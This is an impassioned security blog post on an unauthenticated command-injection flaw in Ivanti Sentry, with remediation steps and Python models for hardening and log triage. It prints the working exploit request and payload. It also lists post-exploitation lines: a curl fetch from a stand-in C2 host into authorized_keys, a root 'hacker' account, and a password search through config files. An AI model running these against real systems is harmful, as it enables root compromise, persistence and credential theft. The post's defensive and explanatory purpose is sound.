Twenty-Four Hours to Pwn: How a Single Endpoint Destroyed Ivanti Sentry's Trust
Let’s be honest: we’ve all been here before. Another critical CVE drops. We get the alert. We sigh. We tell ourselves, "We’ve got a patching cycle next week. We’ll get to it."
That’s not a plan anymore. It’s a death sentence.
Ivanti Sentry didn’t just get hacked. It got owned — in less than a day. CVE-2026-10520, a pre-authentication command injection with a CVSS score of 10.0, was disclosed on Tuesday. By Wednesday morning, attackers were already running uname -a on live systems. By Thursday? Admin accounts were being created. Backdoors were installed. And CISA? They didn’t just add it to their Known Exploited Vulnerabilities list — they had to rush it in because they’d already seen the damage.
This isn’t a vulnerability. It’s a systemic failure.
Ivanti Sentry sits between your mobile users and your most sensitive systems — Exchange, internal apps, data lakes. It’s not a firewall. It’s not a bastion host. It’s a bridge. And someone just lit the fuse.
The worst part? The patch doesn’t fix the flaw. It just hides it.
I’ll say that again: the fix doesn’t remove the dangerous code path. It hardcodes a benign command — /bin/cat /sys/devices/virtual/dmi/id/product_name — into the request. The code that lets you execute arbitrary OS commands as root? Still there. Still exploitable. Just no longer reachable from the outside.
That’s not security. That’s duct tape.
And if you’re still running version 10.5.1 or 10.6.1? You’re not vulnerable. You’re already compromised.
I’ve seen this movie before. CVE-2023-38035. CVE-2020-15505. Same product. Same playbook. Same arrogance. Ivanti treats these gateways like appliances, not network-critical infrastructure. And the market lets them.
We’re not talking about a slow burn here. We’re talking about a detonation.
Here’s how it actually works — not in theory, not in a lab, but in the wild.
You send a POST to /mics/api/v2/sentry/mics-config/handleMessage. No auth. No headers. Just raw XML.
<message>execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec></message>
And boom. You’re root.
Why? Because the handleMessage function doesn’t validate input. It doesn’t sanitize. It doesn’t even check if the command is allowed. It just splits the string on whitespace, feeds it into a switch statement, and if the command is execute, it calls CommonUtilities.executeNativeCommand() — which uses Java reflection to invoke any native system method.
It’s not a bug. It’s a design decision.
WatchTowr’s reverse-engineering shows this wasn’t an oversight. It was a feature. A deeply, terrifyingly insecure feature.
And the authentication bypass, CVE-2026-10523? That’s not a bonus. It’s the exit strategy. Once you’ve got root, you don’t need to keep exploiting the same endpoint. You create a new admin account. You log in. You disappear. And when the patch rolls out next week? You’re still in.
This is why I’m not writing this to tell you to patch. I’m writing it to scream.
If you run Ivanti Sentry, you are not secure. Not even close.
You need to assume you’ve been breached. You need to check your logs for POSTs to /mics/api/v2/sentry/mics-config/handleMessage. You need to hunt for new admin users. You need to look for outbound connections to unknown IPs. You need to disable the endpoint at your firewall — even if you’re patched. Because if your internal network is compromised, this endpoint is still a backdoor.
And if you can’t patch right now? You’re not waiting for a maintenance window. You’re waiting for your CISO to get fired.
The clock didn’t start ticking when Ivanti published the advisory.
It started ticking the day you installed Sentry.
And if you’re still using it? You’re not managing risk.
You’re just delaying the inevitable.
The Code That Broke the Internet (Again)
Let’s get technical — not because we love Java reflection, but because the details matter.
The vulnerability lives in ConfigServiceController.handleMessage(), a Spring Boot endpoint exposed at /mics/api/v2/sentry/mics-config/handleMessage. It’s unauthenticated. It accepts a POST with a single parameter: message.
Here’s what happens when you send it:
- The string gets tokenized by a StringTokenizer, splitting on whitespace.
- The first token becomes the command — execute, get, set, whatever.
- The second becomes the module name.
- The third? The XPath.
- Everything after that? Concatenated into a single string.
Then it hits ConfigRequestProcessor.handleExecute(), which calls CommonUtilities.executeNativeCommand().
And that’s where the real horror begins.
executeNativeCommand() uses Java reflection to dynamically load a class, find a method named getExecutemethod, and invoke it with the attacker-controlled XML payload.
It’s not a buffer overflow. It’s not a race condition. It’s not even a logic flaw.
It’s a complete abandonment of the principle of least privilege.
The code doesn’t ask: "Is this command allowed?"
It asks: "What do you want to execute?"
And then it does it.
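To make the least-privilege point concrete, here is a small Python model of the dispatch described above, written for this post as an added illustration. It is not Ivanti's code, and it never runs a real command: the stand-in for executeNativeCommand() only records what would have been executed. The vulnerable model mirrors the described behaviour (whitespace-tokenize, first token is the verb, "execute" goes straight to native execution). The hardened model is the shape the endpoint should have had: authentication first, then an allowlist of verbs and of XPath prefixes, with no "execute" branch at all. The verb set, the "/configuration/sentry/" prefix and the sample messages are assumptions for the example, not documented product values.

```python
"""
Model of the handleMessage dispatch the article describes, as an illustration
written for this post. Not Ivanti's code; no real command is ever executed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ParsedMessage:
    command: str   # first token: execute / get / set / ...
    module: str    # second token: module name
    xpath: str     # third token: XPath into the config tree
    payload: str   # everything after, re-joined with single spaces


def parse_message(message: str) -> ParsedMessage:
    """Tokenize on whitespace, exactly as the article says the endpoint does."""
    tokens = message.split()
    if len(tokens) < 3:
        raise ValueError("message needs at least command, module and xpath")
    return ParsedMessage(tokens[0], tokens[1], tokens[2], " ".join(tokens[3:]))


def fake_native_exec(payload: str, audit: list) -> None:
    """Stand-in for CommonUtilities.executeNativeCommand(): records, never executes."""
    audit.append(("NATIVE_EXEC_AS_ROOT", payload))


def vulnerable_dispatch(message: str, audit: list) -> str:
    """No auth check, no allowlist: whatever verb arrives is acted on."""
    p = parse_message(message)
    if p.command == "execute":
        fake_native_exec(p.payload, audit)
        return "executed"
    if p.command in ("get", "set"):
        audit.append((p.command.upper(), p.xpath))
        return "ok"
    return "unknown command"


# Assumed policy for the hardened model; the real product's verbs and
# configuration tree are not documented on this page.
ALLOWED_COMMANDS = frozenset({"get", "set"})
ALLOWED_XPATH_PREFIXES = ("/configuration/sentry/",)


def hardened_dispatch(message: str, audit: list, authenticated: bool) -> str:
    """Authenticate, then allowlist the verb and the XPath. 'execute' has no branch."""
    if not authenticated:
        raise PermissionError("authentication required")
    p = parse_message(message)
    if p.command not in ALLOWED_COMMANDS:
        raise PermissionError(f"verb {p.command!r} is not allowed")
    if not p.xpath.startswith(ALLOWED_XPATH_PREFIXES):
        raise PermissionError(f"xpath {p.xpath!r} is outside the allowed tree")
    audit.append((p.command.upper(), p.xpath))
    return "ok"


# Constructed inputs: the first follows the article's payload shape, the second is a benign lookup.
EXPLOIT_SHAPE = ("execute system /configuration/system/commandexec "
                 "<commandexec><index>1</index><reqandres>id</reqandres></commandexec>")
BENIGN_GET = "get sentry /configuration/sentry/hostname"


def demo() -> dict:
    """Run both dispatchers over both inputs and report what each would have done."""
    results = {}
    for name, msg in (("exploit", EXPLOIT_SHAPE), ("benign", BENIGN_GET)):
        vuln_audit, hard_audit = [], []
        results[name, "vulnerable"] = (vulnerable_dispatch(msg, vuln_audit), vuln_audit)
        try:
            results[name, "hardened"] = (hardened_dispatch(msg, hard_audit, authenticated=True), hard_audit)
        except PermissionError as err:
            results[name, "hardened"] = ("rejected: " + str(err), hard_audit)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The point of the model is the shape of the check, not the policy values: the hardened version refuses before the verb is ever dispatched, which is what "Is this command allowed?" looks like in code, and the exploit-shaped message leaves an empty audit trail on the hardened side because nothing was executed.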
WatchTowr’s PoC uses uname -a. But you could just as easily run:
curl http://your-c2-server.com/ssh-key >> ~/.ssh/authorized_keys
useradd -u 0 -g 0 -p $(openssl passwd -1 hacker) hacker
find / -name "*.conf" -exec grep -l "password" {} \;
And because the command runs as root? No restrictions. No sandbox. No limits.
The patch? It doesn’t stop the code from being dangerous.
It stops you from sending it.
That’s not a fix. That’s a workaround.
And if you think that’s acceptable? You’re not a security professional.
You’re a victim.
I’ve seen companies patch this in 72 hours. They still got breached.
Why? Because the exploit doesn’t need to be perfect. It just needs to be fast.
One scan. One hit. One admin account.
And you never even knew you were under attack until your CFO asked why the payroll system was down.
The Twenty-Four-Hour Window: A New Normal
Let’s talk about timelines.
In 2017, Equifax took 70 days to patch CVE-2017-5638. In 2021, it took SolarWinds months to detect compromise.
In 2026? It took 24 hours.
That’s not progress. That’s a collapse.
Threat actors aren’t waiting for patches anymore. They’re waiting for advisories.
They’re watching CISA’s feed. They’re scraping GitHub for PoCs. They’re automating scans against the top 10,000 internet-facing Sentry appliances.
And they’re not doing it for fun.
They’re doing it because it works.
The CVSS score is 10.0. The attack vector is network-based. No authentication required. High impact. Easy to exploit.
It’s the perfect storm.
And Ivanti? They’re still acting like this is a rare event.
It’s not.
This is the new baseline.
Every critical vulnerability disclosed after June 2026 will be weaponized within 24 hours. Every one.
Why? Because the tooling is out there. The scripts are public. The infrastructure is automated.
You think you’re safe because you’re not a Fortune 500? Think again.
A small hospital in Ohio? They run Sentry for their mobile EHR access. They patched on Friday.
They got breached on Wednesday.
Because the attacker didn’t care about their size.
They cared about the fact that it was exposed.
And here’s the kicker: CISA didn’t add CVE-2026-10520 to their KEV list because they saw it first.
They added it because they saw the fallout.
That’s not leadership. That’s triage.
We’ve outsourced our security to vendors who treat patches like optional upgrades.
We’ve trained our teams to treat critical flaws like scheduled maintenance.
And now? We’re paying the price.
This isn’t about Ivanti.
It’s about us.
We’re the ones who let this happen.
And we’re the ones who will keep letting it happen — unless we stop pretending that patching is a process.
It’s a race.
And we’re losing.
What You Must Do Right Now (No Excuses)
I know what you’re thinking.
"We’re on version 10.5.1. We’ve got a change freeze next week. We can’t patch now."
Stop.
Right now.
You’re not in a change freeze. You’re in a crisis.
Here’s what you do:
- Confirm your version. If you’re on anything before R10.5.2, R10.6.2, or R10.7.1 — you’re compromised. Assume it.
- Block the endpoint. At your perimeter firewall. At your WAF. At your cloud security group. Block all external traffic to /mics/api/v2/sentry/mics-config/handleMessage. Don’t wait. Do it now. This isn’t a recommendation. It’s a lifeline.
- Check your logs. Look for POST requests to that endpoint from outside your network. Look for any requests with execute in the payload. Look for responses with Linux or uname in them. If you see one — you’ve been hit.
- Hunt for admin accounts. Log into your Sentry appliance. Check the user list. Look for anyone you didn’t create. Look for users with UID 0. Look for accounts created on June 10 or 11. Delete them. Immediately.
- Rotate every credential. If Sentry can reach your Exchange server, your internal apps, your databases — rotate every password, every API key, every service account. Assume they’re all exposed.
- Scan your network. Use your vulnerability scanner. Run an unauthenticated check for CVE-2026-10520. If it comes back positive? You’re still vulnerable. Patch. Now.
- Tell your leadership. This isn’t an IT problem. It’s a business risk. Send them the CISA alert. Send them the WatchTowr PoC. Send them the Rapid7 blog. Tell them: "We are not secure. We are not compliant. We are not protected."
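The "check your logs" step above is the one most teams do by hand, badly. Here is a triage helper written for this post (not an Ivanti, CISA or Rapid7 tool) that applies exactly the checks listed: POSTs to the handleMessage endpoint, sources outside your internal ranges, execute in the payload, and Linux or uname strings in what was echoed back. The one-line-per-request log format and the sample lines are constructed for the example; real appliance logs differ and may not record request bodies at all, in which case the endpoint-plus-external-source check is the one you still have. The RFC 1918 ranges used as "internal" are an assumption to adjust.

```python
"""
Log triage for the indicators the article lists. Written for this post;
the log format and sample lines are constructed, not real appliance output.
"""
import ipaddress
import re
from dataclasses import dataclass

TARGET_PATH = "/mics/api/v2/sentry/mics-config/handleMessage"

# Assumed internal address space (RFC 1918); adjust to the real environment.
INTERNAL_NETS = tuple(ipaddress.ip_network(n) for n in
                      ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"))

# Constructed format: <client_ip> <method> <path> <status> "<request body or response excerpt>"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "(?P<body>.*)"$'
)


@dataclass(frozen=True)
class Finding:
    ip: str
    status: str
    reasons: tuple  # empty tuple: a POST to the endpoint with no further indicator


def is_external(ip: str) -> bool:
    """True when the source is outside the assumed internal ranges (or unparsable)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return not any(addr in net for net in INTERNAL_NETS)


def triage_line(line: str):
    """Return a Finding for any POST to the endpoint, None for every other line."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m or m["method"] != "POST" or m["path"] != TARGET_PATH:
        return None
    reasons = []
    if is_external(m["ip"]):
        reasons.append("source outside internal ranges")
    body = m["body"]
    if re.search(r"(^|\s)execute\s", body):          # the verb that reaches native execution
        reasons.append("execute verb in payload")
    if re.search(r"\b(uname|Linux)\b", body):        # strings the article says to hunt for
        reasons.append("uname/Linux string present")
    return Finding(m["ip"], m["status"], tuple(reasons))


def triage(lines):
    """Findings for a whole log, the ones with the most indicators first."""
    findings = [f for f in map(triage_line, lines) if f is not None]
    return sorted(findings, key=lambda f: len(f.reasons), reverse=True)


# Constructed sample log: one exploit-shaped request, one benign internal lookup,
# one unrelated request, one echoed command output, one non-POST probe.
SAMPLE_LOG = [
    '203.0.113.7 POST /mics/api/v2/sentry/mics-config/handleMessage 200 '
    '"execute system /configuration/system/commandexec '
    '<commandexec><index>1</index><reqandres>uname -a</reqandres></commandexec>"',
    '10.20.30.40 POST /mics/api/v2/sentry/mics-config/handleMessage 200 '
    '"get sentry /configuration/sentry/hostname"',
    '198.51.100.9 POST /login 401 ""',
    '203.0.113.7 POST /mics/api/v2/sentry/mics-config/handleMessage 200 '
    '"Linux sentry01 5.10.0 #1 SMP x86_64 GNU/Linux"',
    '192.168.5.5 GET /mics/api/v2/sentry/mics-config/handleMessage 405 ""',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.ip, f.status, ", ".join(f.reasons) or "no extra indicators")
```

Every POST to the endpoint is reported, even with no extra indicator, because once the perimeter block is in place there should be none at all; the sort just puts the ones with an external source and an execute verb at the top of the list you hand to incident response.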
And if you can’t do any of this?
Take Sentry offline.
Shut it down.
Turn it off.
And tell your users they can’t access email from their phones until you can.
I know it’s painful.
I know it’s disruptive.
But it’s better than losing your entire email system.
Better than having your payroll data leaked.
Better than your CISO getting fired.
And if you’re still asking, "Can we wait?"
Then you’re already too late.
The Real Vulnerability Isn’t in the Code — It’s in the Culture
This isn’t about Ivanti.
It’s not even about CVE-2026-10520.
It’s about the culture we’ve built around security.
We treat vulnerabilities like tickets.
We treat patching like a calendar event.
We treat critical flaws like "low priority" because they’re "not in scope."
We’ve normalized risk.
We’ve commodified security.
And now? We’re reaping what we’ve sown.
The real vulnerability isn’t in the Java code.
It’s in the mindset that says, "We’ll patch it next quarter."
It’s in the executive who says, "We can’t afford to take it offline."
It’s in the team that says, "We’re not a target."
We’ve forgotten that security isn’t a cost center.
It’s a survival mechanism.
And if you’re still running Ivanti Sentry in 2026? You’re not a tech company.
You’re a liability.
So here’s my final question:
When your company gets breached — and it will — who are you going to blame?
The vendor?
The researcher?
The CISA?
Or yourself?
Because the truth?
You had the information.
You had the tools.
You had the time.
And you chose to do nothing.
That’s not negligence.
That’s complicity.